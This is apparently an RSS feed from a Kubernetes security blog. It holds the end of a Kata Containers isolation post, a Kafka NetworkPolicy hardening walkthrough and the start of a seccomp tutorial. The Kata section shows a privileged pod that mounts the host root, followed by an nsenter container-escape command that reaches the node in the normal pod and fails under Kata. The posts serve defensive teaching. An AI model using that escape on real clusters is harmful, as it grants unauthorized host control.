          securityContext:
            privileged: true
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /
            type: Directory
</code></pre>
<p>Apply:</p>
<pre><code class="language-console">kubectl apply -f escape.yaml
</code></pre>
<h3>Let's Escape</h3>
<p>Let's grab the pods for easy exec access.</p>
<pre><code class="language-console">NORMAL_POD=$(kubectl get pod -l app=normal-escape -o jsonpath='{.items[0].metadata.name}')
KATA_POD=$(kubectl get pod -l app=kata-escape -o jsonpath='{.items[0].metadata.name}')
</code></pre>
<p>Then run the escape on normal pod.</p>
<pre><code class="language-console">matt@kata-k8s-node:~$ kubectl exec -it $NORMAL_POD -- /bin/bash
normal-escape-746ccd6646-jqssr:~# uname -a
Linux normal-escape-746ccd6646-jqssr 6.8.0-1048-gcp #51~22.04.1-Ubuntu SMP Wed Feb 11 02:58:49 UTC 2026 x86_64 Linux
normal-escape-746ccd6646-jqssr:~# nsenter --target 1 --mount --uts --ipc --net --pid
# uname -a 
Linux kata-k8s-node 6.8.0-1048-gcp #51~22.04.1-Ubuntu SMP Wed Feb 11 02:58:49 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux
</code></pre>
<p>Cool, that was easy. Now on to Kata. Same exact sequence.</p>
<pre><code class="language-console">matt@kata-k8s-node:~$ kubectl exec -it $KATA_POD -- /bin/bash
kata-escape-594b89bd47-tt95r:~# uname -a
Linux kata-escape-594b89bd47-tt95r 6.18.15 #1 SMP Tue Mar 17 01:39:00 UTC 2026 x86_64 Linux
kata-escape-594b89bd47-tt95r:~# nsenter --target 1 --mount --uts --ipc --net --pid
nsenter: failed to execute /bin/sh: No such file or directory
</code></pre>
<p>The same namespace escape that worked in a standard container failed in the Kata-backed pod. Not because the command was wrong, but because the target was no longer the host. It was the init process inside a VM. The escape attempt never reached the node.</p>
<hr />
<h2>Wrap Up</h2>
<p>Kata Containers are not complicated. Containers run inside a VM instead of directly on the host kernel. That’s the whole idea.</p>
<p>What can be complicated is everything around it. Getting the right infrastructure. Figuring out why things fail silently. Realizing that Kubernetes will happily accept your configuration even when the underlying runtime has no chance of working. Once you get past that, the behavior is very straightforward.</p>
<p>A normal container shares the host kernel. A privileged workload can pivot into host namespaces and, in the right conditions, reach the node.</p>
<p>A Kata-backed container does not. It runs with its own kernel inside a VM. The same escape attempt stops at that boundary. You are no longer one mistake away from the host.</p>
<p>This is not magic. It is just a shift in where the isolation boundary lives. Whether that tradeoff is worth it depends on your environment. If you are running untrusted workloads, multi-tenant systems, or anything where a container escape actually matters, it starts to look a lot more reasonable.</p>
<p>If nothing else, it is worth running this yourself. Not reading the docs. Not trusting a diagram. Actually running it and seeing what changes. Because once you see it fail in one runtime and stop in another, the difference is no longer theoretical.</p>
<p>This was a light look at Kata containers and isolation. Not to fear, more to come.</p>
]]></content:encoded></item><item><title><![CDATA[Kafka on Kubernetes]]></title><description><![CDATA[Kafka is often treated as background infrastructure. It quietly moves events between services like payments, analytics, notifications, etc. So it is easy to view it as internal plumbing.
But Kafka is not]]></description><link>https://cloudsecburrito.com/kafka-on-kubernetes</link><guid isPermaLink="true">https://cloudsecburrito.com/kafka-on-kubernetes</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[kafka]]></category><category><![CDATA[networkpolicy]]></category><category><![CDATA[cilium]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Mon, 16 Mar 2026 21:06:30 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/95a1ebc8-97d7-4523-a7d1-ac2fea67e7a8.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kafka is often treated as background infrastructure. It quietly moves events between services like payments, analytics, notifications, etc. So it is easy to view it as internal plumbing.</p>
<p>But Kafka is not just another service on the network.</p>
<p>If a workload can reach a Kafka broker, it may be able to read <strong>historical messages across entire topics</strong>. Those topics often contain operational data, user identifiers, or financial events that were never meant to be broadly accessible. The tricky part is that nothing breaks when this happens. Confidentiality failures in Kafka are usually silent. The system keeps running normally while data quietly flows somewhere it should not.</p>
<p>In Kubernetes environments this often starts with networking. By default, pods can communicate freely across namespaces, which means a compromised or misconfigured service may be able to connect to Kafka and consume data it was never meant to see.</p>
<p>In this post we will deploy a simple Kafka cluster with Strimzi, show how an unintended workload can read sensitive events, and then use <strong>networkPolicyPeers</strong> and <strong>Cilium network policy</strong> to enforce the architecture the platform actually intended. The goal is simple. Turn this:</p>
<pre><code class="language-plaintext">Any pod that can reach Kafka can read Kafka
</code></pre>
<p>into this:</p>
<pre><code class="language-plaintext">Only the workloads that should talk to Kafka can reach Kafka
</code></pre>
<p>If you are not familiar with Kafka, it helps to think of it as a distributed event log that services use to publish and consume messages. Producers write events to topics, and consumers read those events to process work or trigger downstream actions. If that model is new to you, it is worth taking a few minutes to read a quick Kafka introduction before continuing. Or watch this <a href="https://www.youtube.com/watch?v=06iRM1Ghr1k&amp;t=30s">cool video</a> from Confluent.</p>
<hr />
<h2>Orientation Diagram</h2>
<p>Keep this diagram in mind.</p>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/5267bef9-9fe6-4eee-bdc2-0c690e88374e.png" alt="" style="display:block;margin:0 auto" />

<p>The architecture is straightforward. <code>payments-api</code> submits payment commands, <code>payments-worker</code> processes them, and Kafka moves the events between services. Workloads outside that flow should not be interacting with Kafka at all.</p>
<p>In theory that separation seems obvious, but Kubernetes does not enforce it by default. If a pod can reach Kafka, it can usually talk to it. The rest of this post walks through that behavior and then shows how <code>NetworkPolicy</code> can enforce the boundaries the platform actually intended.</p>
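<p>For reference, the usual way to flip that default-open behavior is a deny-all ingress policy in the namespace that hosts Kafka. A minimal sketch, not applied in this walkthrough, which takes a Strimzi-centric path instead:</p>
<pre><code class="language-yaml"># Sketch: deny all ingress to every pod in platform-data by default.
# Shown only to illustrate the NetworkPolicy model; not used in this post.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-ingress
  namespace: platform-data
spec:
  podSelector: {}
  policyTypes:
    - Ingress
</code></pre>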
<hr />
<h2>The Architecture We Think We Built</h2>
<p>For this example we will model a simple event-driven payments system. Kafka runs in a dedicated namespace called <code>platform-data</code>. Application workloads live in their own namespaces and communicate with Kafka to produce or consume events.</p>
<p>Two services exist in the <code>payments</code> namespace:</p>
<ul>
<li><p><strong>payments-api</strong> Internet-facing service that receives payment requests. Its only responsibility is to produce messages to the <code>payments.commands</code> topic.</p>
</li>
<li><p><strong>payments-worker</strong> Internal service that processes those commands and produces results to <code>payments.events</code>.</p>
</li>
</ul>
<p>The system also contains an unrelated namespace:</p>
<ul>
<li><strong>analytics</strong> Batch jobs and internal tooling that should not interact with the payments pipeline at all.</li>
</ul>
<p>The Kafka topics look like this:</p>
<pre><code class="language-plaintext">payments.commands
payments.events
</code></pre>
<p>The intended architecture is straightforward.</p>
<pre><code class="language-plaintext">payments-api      → produce → payments.commands
payments-worker   → consume → payments.commands
payments-worker   → produce → payments.events
analytics         → no Kafka access
</code></pre>
<p>In other words, the API tier can submit payment requests, the worker tier processes them, and the resulting events are published for downstream consumers. Under this model, the <code>payments.events</code> topic may contain sensitive operational data such as payment identifiers, customer references, or transaction outcomes. Only trusted internal services should be able to read from it.</p>
<p>The assumption many teams make is that Kubernetes namespaces and service boundaries already enforce this separation.</p>
<hr />
<h2>Baseline Deployment</h2>
<p>To understand the problem, we will first deploy the architecture from the previous diagram. This section sets up a Kafka cluster, creates the payment topics, and deploys the example workloads. No network policy is applied yet.</p>
<p>The goal is simply to establish a working environment before we test how workloads interact with Kafka.</p>
<h3>Create Namespaces</h3>
<pre><code class="language-bash">kubectl create ns platform-data
kubectl create ns payments
kubectl create ns analytics
</code></pre>
<p><code>platform-data</code> will host Kafka, while application workloads live in their own namespaces.</p>
<h3>Install the Strimzi Operator</h3>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl apply -f 'https://strimzi.io/install/latest?namespace=platform-data' -n platform-data
clusterrole.rbac.authorization.k8s.io/strimzi-cluster-operator-leader-election created
deployment.apps/strimzi-cluster-operator created
customresourcedefinition.apiextensions.k8s.io/kafkanodepools.kafka.strimzi.io unchanged
clusterrole.rbac.authorization.k8s.io/strimzi-cluster-operator-global created
...
</code></pre>
<p>Strimzi manages the lifecycle of the Kafka cluster inside Kubernetes.</p>
<h3>Deploy Kafka</h3>
<p>Save the following as <code>kafka.yaml</code>.</p>
<pre><code class="language-yaml">apiVersion: kafka.strimzi.io/v1
kind: KafkaNodePool
metadata:
  name: demo-pool
  namespace: platform-data
  labels:
    strimzi.io/cluster: demo
spec:
  replicas: 3
  roles:
    - controller
    - broker
  storage:
    type: ephemeral
---
apiVersion: kafka.strimzi.io/v1
kind: Kafka
metadata:
  name: demo
  namespace: platform-data
spec:
  kafka:
    version: 4.1.1
    listeners:
      - name: plain
        port: 9092
        type: internal
        tls: false
    config:
      default.replication.factor: 3
      min.insync.replicas: 2
      offsets.topic.replication.factor: 3
      transaction.state.log.replication.factor: 3
      transaction.state.log.min.isr: 2
      inter.broker.protocol.version: "4.1"
</code></pre>
<p>This manifest deploys a small Kafka cluster using Strimzi. The <code>KafkaNodePool</code> defines three nodes that act as both controllers and brokers, which is enough to run a functional cluster for testing. Storage is configured as ephemeral since the goal of this environment is just demonstration.</p>
<p>The <code>Kafka</code> resource configures the broker itself. It exposes an internal listener on port 9092, disables TLS for simplicity, and sets the replication settings so topics can be replicated across the three brokers.</p>
<p>In short, this creates a minimal but fully functional Kafka cluster that other workloads in the cluster can connect to through the <code>demo-kafka-bootstrap</code> service.</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl apply -f kafka.yaml
kafkanodepool.kafka.strimzi.io/demo-pool created
kafka.kafka.strimzi.io/demo created
</code></pre>
<p>Verify the Kafka services:</p>
<pre><code class="language-bash">kubectl get svc -n platform-data | grep demo-kafka
</code></pre>
<h3>Create Kafka Topics</h3>
<p>Launch a temporary Kafka CLI pod:</p>
<pre><code class="language-bash">kubectl -n payments run kafka-toolbox   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d
</code></pre>
<p>This creates a temporary pod containing the Kafka CLI tools. The pod runs <code>sleep 1d</code> so it stays alive long enough for us to execute commands inside it with <code>kubectl exec</code>. We will use it to create topics and interact with the Kafka cluster from inside Kubernetes.</p>
<p>Create the topics used by the payments system. Kafka prints a warning about topic names containing <code>.</code> or <code>_</code>, but this does not affect the topic itself; it is created successfully and can be used normally.</p>
<pre><code class="language-bash">kubectl -n payments exec -it kafka-toolbox -- /opt/kafka/bin/kafka-topics.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --create --topic payments.commands --partitions 3 --replication-factor 3
</code></pre>
<pre><code class="language-bash">kubectl -n payments exec -it kafka-toolbox -- /opt/kafka/bin/kafka-topics.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --create --topic payments.events --partitions 3 --replication-factor 3
</code></pre>
<p>These commands create the two topics used by the payment system. <code>payments.commands</code> will carry incoming payment requests, while <code>payments.events</code> will contain the resulting payment outcomes. Each topic is created with three partitions and a replication factor of three so the data is distributed across the Kafka brokers.</p>
<h3>Deploy the Example Workloads</h3>
<p>Create two simple pods representing the application services.</p>
<h4>payments-api</h4>
<pre><code class="language-bash">kubectl -n payments run payments-api   --labels app=payments-api   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d
</code></pre>
<h4>payments-worker</h4>
<pre><code class="language-bash">kubectl -n payments run payments-worker   --labels app=payments-worker   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d
</code></pre>
<p>These pods simply provide access to the Kafka CLI tools so we can simulate application behavior.</p>
<hr />
<h2>Testing Kafka Access</h2>
<p>Now that the environment is deployed, we can test how workloads interact with Kafka.</p>
<h3>Generate Payment Events</h3>
<p>From the worker pod:</p>
<pre><code class="language-bash">kubectl -n payments exec -it payments-worker -- bash -lc 'for i in {1..5}; do echo "{\"payment_id\":\"p-$i\",\"status\":\"APPROVED\",\"customer\":\"cust-$i\",\"amount\":$((i*10))}"; done | /opt/kafka/bin/kafka-console-producer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events'
</code></pre>
<p>This command generates a few sample payment events and sends them to the <code>payments.events</code> topic using the Kafka console producer.</p>
<h3>Intended Read</h3>
<p>The worker should be able to read the events it produces.</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl -n payments exec -it payments-worker -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages
</code></pre>
<p>This succeeds as expected.</p>
<h3>Unintended Read</h3>
<p>Now run the same command from <code>payments-api</code>.</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl -n payments exec -it payments-api -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages
</code></pre>
<p>This works because nothing in the cluster currently limits which pods can reach Kafka. The <code>payments-api</code> pod can connect to the same broker service as <code>payments-worker</code>, and Kafka does not distinguish between them in this demo. As long as a pod can reach the broker, it can consume the topic.</p>
<h3>Cross Namespace Access</h3>
<p>Even unrelated workloads can reach Kafka.</p>
<pre><code class="language-bash">kubectl -n analytics run analytics-random   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d
</code></pre>
<p>Then consume events:</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl -n analytics exec -it analytics-random -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages
</code></pre>
<hr />
<h2>Restricting Kafka Access with Strimzi Network Peers</h2>
<p>So how can we make this a bit safer? The first improvement is to restrict which workloads can reach the Kafka listener at all.</p>
<p>Strimzi can generate a Kubernetes <code>NetworkPolicy</code> for Kafka listeners directly from the Kafka resource definition. Taking a look we can see what it created.</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl get netpol -A
NAMESPACE       NAME                        POD-SELECTOR                                                               AGE
platform-data   demo-network-policy-kafka   strimzi.io/cluster=demo,strimzi.io/kind=Kafka,strimzi.io/name=demo-kafka   115m
</code></pre>
<p>Oddly enough, we never did anything to create this. So what if we want to change it? You can, through the <code>networkPolicyPeers</code> field on the listener configuration. Instead of leaving the listener open to the entire cluster, we can limit which namespaces or pods are allowed to connect to the broker port.</p>
<p>Below is a simplified example restricting access to the <code>payments</code> namespace.</p>
<pre><code class="language-yaml">listeners:
  - name: plain
    port: 9092
    type: internal
    tls: false
    networkPolicyPeers:
      - namespaceSelector:
          matchLabels:
            kubernetes.io/metadata.name: payments
</code></pre>
<p>When this configuration is applied, Strimzi generates a Kubernetes <code>NetworkPolicy</code> that allows connections to the Kafka listener only from workloads in the <code>payments</code> namespace.</p>
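<p>You can inspect the result with <code>kubectl -n platform-data get netpol -o yaml</code>. The generated policy looks roughly like this (a sketch with selectors abbreviated, not Strimzi's exact output):</p>
<pre><code class="language-yaml"># Rough sketch of the NetworkPolicy Strimzi generates for the listener.
# Check the real object with kubectl; it also covers inter-broker ports.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: demo-network-policy-kafka
  namespace: platform-data
spec:
  podSelector:
    matchLabels:
      strimzi.io/name: demo-kafka
  ingress:
    - from:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: payments
      ports:
        - port: 9092
          protocol: TCP
</code></pre>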
<p>Once we've applied the updated listener configuration, let's try one consumer inside the namespace and one outside, as before.</p>
<p>Works:</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl -n payments exec -it payments-worker -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages
</code></pre>
<p>Doesn't Work:</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl -n analytics exec -it analytics-random -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
Processed a total of 0 messages
</code></pre>
<p>That is great, but it would probably be easier to manage access outside Strimzi, using an ordinary <code>NetworkPolicy</code> or <code>CiliumNetworkPolicy</code>. But how can we do that when Strimzi always generates a listener policy, whether default or customized?</p>
<hr />
<h2>Bring Your Own NetworkPolicy</h2>
<p>Restricting the Kafka listener with Strimzi <code>networkPolicyPeers</code> works, but it also introduces another layer of policy management that may not always be desirable.</p>
<p>Instead, we can allow Strimzi to generate its listener policy while making it effectively match no real workloads. This keeps the listener closed by default and lets us explicitly manage access using our own network policies.</p>
<p>One simple way to do this is to configure the listener peers so they match a namespace that does not exist.</p>
<pre><code class="language-yaml">listeners:
  - name: plain
    port: 9092
    type: internal
    tls: false
    networkPolicyPeers:
      - namespaceSelector:
          matchLabels:
            kubernetes.io/metadata.name: neverusedns
</code></pre>
<p>With this configuration, the Strimzi-generated NetworkPolicy no longer matches real client pods. The Kafka listener is effectively closed to normal workloads.</p>
<p>From there, we can explicitly allow the intended clients using a Cilium network policy.</p>
<pre><code class="language-yaml">apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: kafka-worker-only
  namespace: platform-data
spec:
  endpointSelector:
    matchLabels:
      k8s:app.kubernetes.io/instance: demo
      k8s:io.kubernetes.pod.namespace: platform-data
  ingress:
    - fromEndpoints:
        - matchLabels:
            k8s:app: payments-worker
            k8s:io.kubernetes.pod.namespace: payments
      toPorts:
        - ports:
            - port: "9092"
              protocol: TCP
</code></pre>
<p>This policy selects the Kafka broker pods in the <code>platform-data</code> namespace and allows inbound traffic to port <code>9092</code> only from pods labeled <code>app=payments-worker</code> in the <code>payments</code> namespace.</p>
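<p>If you are not running Cilium, a plain Kubernetes <code>NetworkPolicy</code> can express roughly the same rule. A sketch, assuming the broker pods carry the <code>strimzi.io/name: demo-kafka</code> label we saw on the generated policy:</p>
<pre><code class="language-yaml"># Sketch: vanilla NetworkPolicy roughly equivalent to the Cilium policy above.
# Assumes broker pods are labeled strimzi.io/name=demo-kafka and the payments
# namespace carries the standard kubernetes.io/metadata.name label.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: kafka-worker-only
  namespace: platform-data
spec:
  podSelector:
    matchLabels:
      strimzi.io/name: demo-kafka
  ingress:
    - from:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: payments
          podSelector:
            matchLabels:
              app: payments-worker
      ports:
        - port: 9092
          protocol: TCP
</code></pre>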
<hr />
<h2>Wrap Up</h2>
<p>This exercise originally started while experimenting with a Kafka-aware Cilium feature that is now being deprecated. While that path turned out to be a dead end, it ended up being a useful way to explore how network policy actually behaves in a real Kubernetes use case.</p>
<p>What the experiment ultimately showed is that network policy is very good at shrinking the <strong>trust boundary</strong>, but it cannot eliminate trust entirely.</p>
<p>In our case we moved through three stages:</p>
<ul>
<li><p>Default Kubernetes networking where any pod could reach Kafka</p>
</li>
<li><p>Restricting listener access with Strimzi <code>networkPolicyPeers</code></p>
</li>
<li><p>Explicitly allowing only the required workload using a Cilium policy for ease of management</p>
</li>
</ul>
<p>Each step reduced the blast radius. Instead of trusting the entire cluster, we narrowed the boundary to a specific application, and finally to a specific workload.</p>
<p>But some trust still remains. If both a producer and consumer legitimately need to reach Kafka, the network layer alone cannot perfectly distinguish their roles. At some point the system must trust that the service behaves the way the architecture intends.</p>
<p>Security controls rarely eliminate trust boundaries, but they do <strong>make them smaller and more explicit</strong>.</p>
<p>In this example, the goal was not to achieve perfect isolation. It was to turn a flat cluster network where <em>any pod could read Kafka</em> into a system where <strong>only the workloads that should talk to Kafka can reach it at all</strong>.</p>
]]></content:encoded></item><item><title><![CDATA[Seccomp in Kubernetes]]></title><description><![CDATA[In Part 1, we stayed close to the kernel.
We watched a process call uname(), attach a seccomp filter, and then get shut down at the syscall boundary. No permissions debate. No LSM policy. No capability check. The kernel simply said: that syscall does...]]></description><link>https://cloudsecburrito.com/seccomp-in-kubernetes</link><guid isPermaLink="true">https://cloudsecburrito.com/seccomp-in-kubernetes</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Seccomp]]></category><category><![CDATA[Security]]></category><category><![CDATA[Linux]]></category><category><![CDATA[Kubernetes Security]]></category><category><![CDATA[runtime]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Mon, 16 Feb 2026 22:00:14 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1771198527450/202ca71b-96d2-4d0e-a6fb-3f5be8f7b658.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In <a target="_blank" href="https://cloudsecburrito.com/seccomp-the-syscall-firewall">Part 1</a>, we stayed close to the kernel.</p>
<p>We watched a process call <code>uname()</code>, attach a seccomp filter, and then get shut down at the syscall boundary. No permissions debate. No LSM policy. No capability check. The kernel simply said: that syscall does not exist for you anymore.</p>
<p>Clean. Brutal.</p>
<p>But what about the Kubernetes part? You're probably already running seccomp.</p>
<p>Not because you enabled it. Not because you wrote a profile. And definitely not because you tuned it.</p>
<p>You're running it because your container runtime turned it on for you. When a container starts, the application doesn’t install a seccomp filter. The container runtime does. Docker, containerd, etc. attach a default profile before your code ever runs. Kubernetes doesn’t enforce syscalls. It simply tells the runtime which profile to use. The actual enforcement still happens at the same kernel boundary we saw in Part 1. And once seccomp moves from "toy C demo" to "running cluster," the questions change.</p>
<p>Not the stuff we know:</p>
<ul>
<li><p>What is a syscall?</p>
</li>
<li><p>How does BPF work?</p>
</li>
</ul>
<p>But:</p>
<ul>
<li><p>What profile is actually active on my pods?</p>
</li>
<li><p>What does it allow?</p>
</li>
<li><p>And what happens if I turn it off?</p>
</li>
</ul>
<p>That’s where we’re going.</p>
<hr />
<h2 id="heading-orientation-diagram">Orientation Diagram</h2>
<p>Keep this diagram in mind.</p>
<p>Everything in this post is about how a seccomp profile defined in a Pod spec ends up enforced inside the kernel. Kubernetes selects the profile. The container runtime attaches it. The kernel evaluates every syscall against it.</p>
<p>The enforcement point hasn’t moved. It’s still the syscall boundary we explored in Part 1. What’s changed is the plumbing that decides which filter gets there.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1771198200512/b1580a7c-0597-4324-a66b-627d5a6e83e4.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-the-most-common-case-nothing-configured">The Most Common Case: Nothing Configured</h2>
<p>In many clusters, pods don’t specify a seccomp profile at all.</p>
<p>The pod spec is silent.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-literal">no</span><span class="hljs-string">-seccomp</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-literal">no</span><span class="hljs-string">-seccomp</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-literal">no</span><span class="hljs-string">-seccomp</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx</span>
</code></pre>
<p>It’s simply not present. So what happens? It will run completely unconfined. Create this deployment and check inside the container.</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ kubectl <span class="hljs-built_in">exec</span> no-seccomp-75d54c6445-s7ln8 -- grep Seccomp /proc/1/status
Seccomp:    0
Seccomp_filters:    0
</code></pre>
<p>We can see <code>Seccomp: 0</code>, which of course means no seccomp.</p>
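<p>For reference, the <code>Seccomp</code> field in <code>/proc/&lt;pid&gt;/status</code> reports the kernel's seccomp mode: <code>0</code> is disabled, <code>1</code> is the legacy strict mode, and <code>2</code> is filter mode, which is what a runtime-attached BPF profile shows up as. The same check works against any process on any Linux box, for example your current shell:</p>

```shell
# Seccomp mode of the current process:
# 0 = disabled, 1 = strict, 2 = filter (what a runtime default profile shows as).
grep Seccomp /proc/self/status
```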
<hr />
<h2 id="heading-a-simple-way-to-see-seccomp-in-action">A Simple Way to See Seccomp in Action</h2>
<p>One syscall commonly blocked by the runtime’s default seccomp profile is <code>keyctl</code>.</p>
<p><code>keyctl</code> interacts with the Linux kernel keyring subsystem. Most containers don’t need to manage kernel keyrings, so the default profile blocks it as unnecessary attack surface.</p>
<p>If you’re using the basic Nginx image, you can install a small test tool:</p>
<pre><code class="lang-bash">matt@cp:~$ kubectl <span class="hljs-built_in">exec</span> -it no-seccomp-75d54c6445-s7ln8 -- /bin/bash
root@no-seccomp-75d54c6445-s7ln8:/<span class="hljs-comment"># apt-get update &amp;&amp; apt-get install -y keyutils</span>
</code></pre>
<p>Then run:</p>
<pre><code class="lang-bash">root@no-seccomp-75d54c6445-s7ln8:/<span class="hljs-comment"># keyctl show</span>
Session Keyring
 857262715 --alswrv      0     0  keyring: ...
</code></pre>
<p>As we would expect.</p>
<p>Now why this example? The kernel keyring subsystem stores sensitive material such as session keys. Direct interaction with kernel-managed key storage is not something typical application containers need.</p>
<p>From an attacker’s perspective, however, kernel keyrings can become part of privesc and more.</p>
<p>Blocking <code>keyctl</code> removes that entire class of risk (sound familiar?). That’s the core idea behind seccomp: if the workload doesn’t need it, the syscall doesn’t exist.</p>
<hr />
<h2 id="heading-runtimedefault-making-the-baseline-explicit">RuntimeDefault: Making the Baseline Explicit</h2>
<p>Instead of relying on cluster defaults (aka nothing), you can declare your intent directly. Let's give it a shot in a new deployment.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-literal">yes</span><span class="hljs-string">-seccomp</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-literal">yes</span><span class="hljs-string">-seccomp</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-literal">yes</span><span class="hljs-string">-seccomp</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">imagePullPolicy:</span> <span class="hljs-string">IfNotPresent</span>
          <span class="hljs-attr">securityContext:</span>
            <span class="hljs-attr">seccompProfile:</span>
              <span class="hljs-attr">type:</span> <span class="hljs-string">RuntimeDefault</span>
</code></pre>
<p>This tells Kubernetes to use the default seccomp profile provided by the container runtime. The runtime attaches that profile before the container process starts. The kernel enforces it on every syscall. Just a filter at the syscall boundary.</p>
<p>Let's run the same exercise as before.</p>
<pre><code class="lang-bash">matt@cp:~$ kubectl <span class="hljs-built_in">exec</span> -it yes-seccomp-796856b464-hqq44 -- /bin/bash
root@yes-seccomp-796856b464-hqq44:/<span class="hljs-comment"># apt-get update &amp;&amp; apt-get install -y keyutils</span>
</code></pre>
<p>Then run:</p>
<pre><code class="lang-bash">root@yes-seccomp-796856b464-hqq44:/<span class="hljs-comment"># keyctl show</span>
Session Keyring
